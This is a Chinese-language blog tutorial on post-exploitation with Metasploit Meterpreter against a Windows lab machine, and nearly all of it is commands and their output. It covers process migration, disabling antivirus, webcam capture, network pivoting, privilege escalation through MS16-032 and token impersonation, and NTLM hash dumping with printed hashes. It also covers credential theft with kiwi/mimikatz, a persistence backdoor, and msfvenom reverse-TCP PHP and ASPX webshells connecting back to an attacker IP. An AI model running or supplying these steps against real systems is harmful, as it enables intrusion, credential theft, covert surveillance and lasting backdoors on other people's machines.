後滲透攻擊
阿新 • • 發佈:2021-08-15
成功拿到目標機器shell後還可以做什麼,本篇文章就具體介紹後滲透的一些基本操作
後滲透攻擊
檢視目標機程序
meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System x64 0 264 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 316 504 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 348 340 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 400 340 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe 412 392 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 460 392 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe 504 400 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe ..................
程序遷移
手動遷移
meterpreter > getpid #檢視當前程序 Current pid: 1124 meterpreter > migrate 2328 #程序遷移 [*] Migrating from 1124 to 2328... [*] Migration completed successfully. meterpreter > getpid #再次檢視發現,確認成功遷移 Current pid: 2328 meterpreter > kill 1124 #殺死原來程序 Killing: 1124 [-] 1077: Operation failed: Access is denied.
自動遷移
meterpreter > run post/windows/manage/migrate
資訊收集
meterpreter > sysinfo #檢視系統資訊 Computer : BAJI-PC OS : Windows 7 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : zh_CN Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > run post/windows/gather/checkvm #檢查是否執行在虛擬機器上 [*] Checking if BAJI-PC is a Virtual Machine ... [+] This is a VMware Virtual Machine meterpreter > idletime #檢查是否在執行,並檢視最近執行時間 User has been idle for: 9 mins 59 secs meterpreter > getuid #檢視已經滲透成功的使用者名稱 Server username: baji-PC\baji meterpreter > run post/windows/manage/killav #關閉目標機防毒軟體 [*] No target processes were found. meterpreter > route #檢視網路設定 IPv4 network routes =================== Subnet Netmask Gateway Metric Interface ------ ------- ------- ------ --------- 0.0.0.0 0.0.0.0 192.168.160.2 10 11 127.0.0.0 255.0.0.0 127.0.0.1 306 1 127.0.0.1 255.255.255.255 127.0.0.1 306 1 127.255.255.255 255.255.255.255 127.0.0.1 306 1 192.168.160.0 255.255.255.0 192.168.160.132 266 11 192.168.160.132 255.255.255.255 192.168.160.132 266 11 192.168.160.255 255.255.255.255 192.168.160.132 266 11 224.0.0.0 240.0.0.0 127.0.0.1 306 1 224.0.0.0 240.0.0.0 192.168.160.132 266 11 255.255.255.255 255.255.255.255 127.0.0.1 306 1 255.255.255.255 255.255.255.255 192.168.160.132 266 11 No IPv6 routes were found. meterpreter > run post/windows/gather/enum_logged_on_users #檢視當前登入使用者資訊 [*] Running against session 1 Current Logged Users ==================== SID User --- ---- S-1-5-21-1722394881-3080478103-2565725322-1001 baji-PC\baji [+] Results saved in: /home/zhiji/.msf4/loot/20210212153318_default_192.168.160.132_host.users.activ_894639.txt Recently Logged Users ===================== SID Profile Path --- ------------ S-1-5-18 %systemroot%\system32\config\systemprofile S-1-5-19 C:\Windows\ServiceProfiles\LocalService S-1-5-20 C:\Windows\ServiceProfiles\NetworkService S-1-5-21-1722394881-3080478103-2565725322-1001 C:\Users\baji meterpreter > run post/windows/gather/enum_applications #檢視當前執行的app應用程式 [*] Enumerating applications installed on BAJI-PC Installed Applications ====================== Name Version ---- ------- Google Chrome 88.0.4324.150 Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.20.27508 14.20.27508.1 Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.20.27508 14.20.27508.1 Microsoft Visual C++ 2019 X64 Additional Runtime - 14.20.27508 14.20.27508 Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.20.27508 14.20.27508 Microsoft Visual C++ 2019 X86 Additional Runtime - 14.20.27508 14.20.27508 Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.20.27508 14.20.27508 Mozilla Firefox 85.0.1 (x86 zh-CN) 85.0.1 Mozilla Maintenance Service 85.0.1 VMware Tools 11.0.0.14549434 phpstudy整合環境 8.1.1.2 [+] Results stored in: /home/zhiji/.msf4/loot/20210212153406_default_192.168.160.132_host.application_671096.txt meterpreter > run post/windows/gather/credentials/windows_autologin #抓取自動登入的使用者和密碼 [*] Running against BAJI-PC on session 1 [*] The Host BAJI-PC is not configured to have AutoLogon password meterpreter > load espia #載入Espia外掛 Loading extension espia...Success. meterpreter > screengrab #抓取當前螢幕截圖 Screenshot saved to: /home/zhiji/桌面/AaCPrqTV.jpeg #路徑 meterpreter > screenshot #也可抓取當前螢幕截圖 Screenshot saved to: /home/zhiji/桌面/RTEXARvH.jpeg #路徑 meterpreter > wbcam_list #檢視目標機有沒有攝像頭 meterpreter > wbcam_snap #開啟目標機攝像頭並拍張照 meterpreter > wbcam_stream #開啟直播模式 meterpreter > shell #進shell,exit命令退出 Process 2380 created. Channel 2 created. Microsoft Windows [�汾 6.1.7601] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ���� C:\Windows\system32>
路由跳轉設定
meterpreter > run get_local_subnets #檢視目標機子網
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.160.0/255.255.255.0
meterpreter > run autoroute -s 192.168.160.0/24 #新增路由
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...] [*] Adding a route to 192.168.160.0/255.255.255.0...
[+] Added route to 192.168.160.0/255.255.255.0 via 192.168.160.132 [*] Use the -p option to list all active routes
meterpreter > run autoroute -p #檢視路由是否新增成功
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] Active Routing Table
==================== Subnet Netmask Gateway
------ ------- -------
192.168.160.0 255.255.255.0 Session 1
檔案命令
pwd #檢視當前處於目標機的那個目錄
getlwd #檢視當前本地目錄
ls #列出所有目錄
cd #切換目錄
search -f*.txt -d c:\ #搜尋C盤中所有的.txt檔案
download c:\aa.txt /root #下載目標機1.txt到攻擊機root目錄下
upload /root/1.txt c:\ #上傳檔案到c
提權
通過本地溢位漏洞提權
1、先通過getsystem命令提權,結果失敗
meterpreter > getsystem
[-] 2001: Operation failed: This function is not supported on this system. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
2、利用WMIC命令列出已安裝的補丁(這些輸出的結果不能直接被利用的,使用的方式是去找提權的EXP,使用沒有下列編號的EXP進行提權)
C:\Users\baji\Desktop>Wmic qfe get Caption,Description,HotFixID,InstalledOn
Wmic qfe get Caption,Description,HotFixID,InstalledOn
Caption Description HotFixID InstalledOn
http://support.microsoft.com/?kbid=2534111 Hotfix KB2534111 1/4/2021
http://support.microsoft.com/?kbid=2999226 Update KB2999226 1/4/2021
http://support.microsoft.com/?kbid=976902 Update KB976902 11/21/2010
3、首先把meterpreter轉為後臺執行,然後搜尋提權的EXP漏洞,這裡用MS16_032舉例
seach ms16_032
use 1 #1:可用模組id
set session 1 #指定服務id
run
getuid #檢視當前許可權
令牌竊取提權
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u #列出可用的token
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
baji-PC\Administrator
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
No tokens available
meterpreter > impersonate_token baji-PC\\Administrator #冒充上面的使用者登入,注意這裡主機名和使用者名稱間是兩反斜槓\\
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user baji-PC\Administrator
meterpreter > shell
Process 2152 created.
Channel 2 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
C:\Users\Administrator\Desktop>whoami #檢視當前使用者
whoami
baji-pc\administrator
C:\Users\Administrator\Desktop>
Hash攻擊
hashdump
使用hashdump抓取密碼,hashdump meterpreter指令碼可以從目標機提取hash值,破解hash值就可獲得登入密碼
meterpreter > getsystem #在上面的提權後就可以使用這一命令進一步提權了
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > hashdump #hashdump命令的執行必須要system許可權,並且目標機沒有開啟UAC
[-] 2007: Operation failed: The parameter is incorrect.
面對上面的問題這裡我們使用另一個更加強大的模組smart_hashdump,不僅可以匯出所有使用者的hash,而且可以繞過UAC
meterpreter > run windows/gather/smart_hashdump
[*] Running module against BAJI-PC
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /home/zhiji/.msf4/loot/20210213214048_default_192.168.160.132_windows.hashes_515778.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY be81bb778283c994c7c2ebafd8f51b04...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[+] baji:"1"
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:69943c5e63b4d2c104dbbcc15138b72b:::
[+] baji:1001:aad3b435b51404eeaad3b435b51404ee:69943c5e63b4d2c104dbbcc15138b72b:::
[+] HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:59c8c6d121b9a6b2cc21bade49bfe630:::
meterpreter >
kiwi
使用kiwi抓取密碼-------舊版本的mimikatz已被該模組取代,該模組更加強大
kiwi模組同時支援32位和64位的系統,但是該模組預設是載入32位的系統,所以如果目標主機是64位系統的話,直接預設載入該模組會導致很多功能無法使用。所以如果目標系統是64位的,則必須先檢視系統程序列表,然後將meterpreter程序遷移到一個64位程式的程序中,才能載入kiwi並且檢視系統明文。如果目標系統是32位的,則沒有這個限制。
meterpreter > getpid #我的目標機是64位,所以先遷移一下程序
Current pid: 2336
meterpreter > migrate 2528
[*] Migrating from 2336 to 2528...
[*] Migration completed successfully.
meterpreter > getpid #遷移成功
Current pid: 2528
meterpreter > load mimikatz #載入mimikatz模組,這裡提示我已被wiki取代請以後都用wiki(手動狗頭)
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > help kiwi #檢視幫助
Kiwi Commands
=============
Command Description
------- -----------
creds_all #列舉所有憑據/所有的系統密碼
creds_kerberos #列舉所有kerberos憑據
creds_msv #列舉所有msv憑據
creds_ssp #列舉所有ssp憑據
creds_tspkg #列舉所有tspkg憑據
creds_wdigest #列舉所有wdigest憑據
dcsync #通過DCSync檢索使用者帳戶資訊
dcsync_ntlm #通過DCSync檢索使用者帳戶NTLM雜湊、SID和RID
golden_ticket_create #建立黃金票據
kerberos_ticket_list #列舉kerberos票據
kerberos_ticket_purge #清除kerberos票據
kerberos_ticket_use #使用kerberos票據
kiwi_cmd #kiwi_cmd 模組可以讓我們使用mimikatz的全部功能,該命令後面接 mimikatz.exe 的命令
lsa_dump_sam #dump出lsa的SAM
lsa_dump_secrets #dump出lsa的密文
password_change #修改密碼
wifi_list #列出當前使用者的wifi配置檔案
wifi_list_shared #列出共享wifi配置檔案/編碼
後門
persistence後門
persistence是一款使用安裝自啟動方式的永續性後門程式,可以利用它建立註冊和檔案。啟動時會觸發防毒軟體,建議執行時關閉防毒軟體
run persistence -A -S -u -i 60 -P 4321 -r 192.168.160.132
A #自動啟動payload程式
S #系統啟動時自動載入
U #使用者登入時自動啟動
X #機時自動掛載
i #連時的時間間隔
P #聽反向連線埠號
r #標機器IP地址
sessions #檢視已經成功獲取的會話
web後門
1、meterpreter後門
metasploit中,有一個名為PHP Meterpreter的payload,利用該模組可以建立具有meterpreter功能PHP Webshell
使用msfvrenom工具製作webshell.php
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.160.129 -f raw > /1.php
-p用於參與payload -f用於設定輸出檔案格式
將1.php上傳到目標伺服器,這裡直接複製到/var/www/html目錄下
接著啟動msfconsole,使用以下命令設定監聽
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.160.129
run
目標機訪問http://127.0.0.1/1.php,反彈成功
2、aspx meterpreter後門
metasploit下名為shell_reverse_tcp的payload,利用這個模組可建立具有meterpreter功能的各版本webshell
show payloads
use windows/shell_reverse_tcp
info
set lhost 192.168.160.129
set lport 4444
sava
generate -t asp //生成asp版的shellcode
generate -t aspx //生成aspx版的shellcode
先把內容儲存為aspx.aspx,再上傳到目標伺服器,然後啟動msfconsole
use expoloit/mulit/handler
set payload windows/meterpreter/reversr_tcp
set Lhost 192.168.160.120
set lport 4444
run
反彈成功
關於我
個人部落格地址:www.zhiji.icu
歡迎關注公眾號:知己安全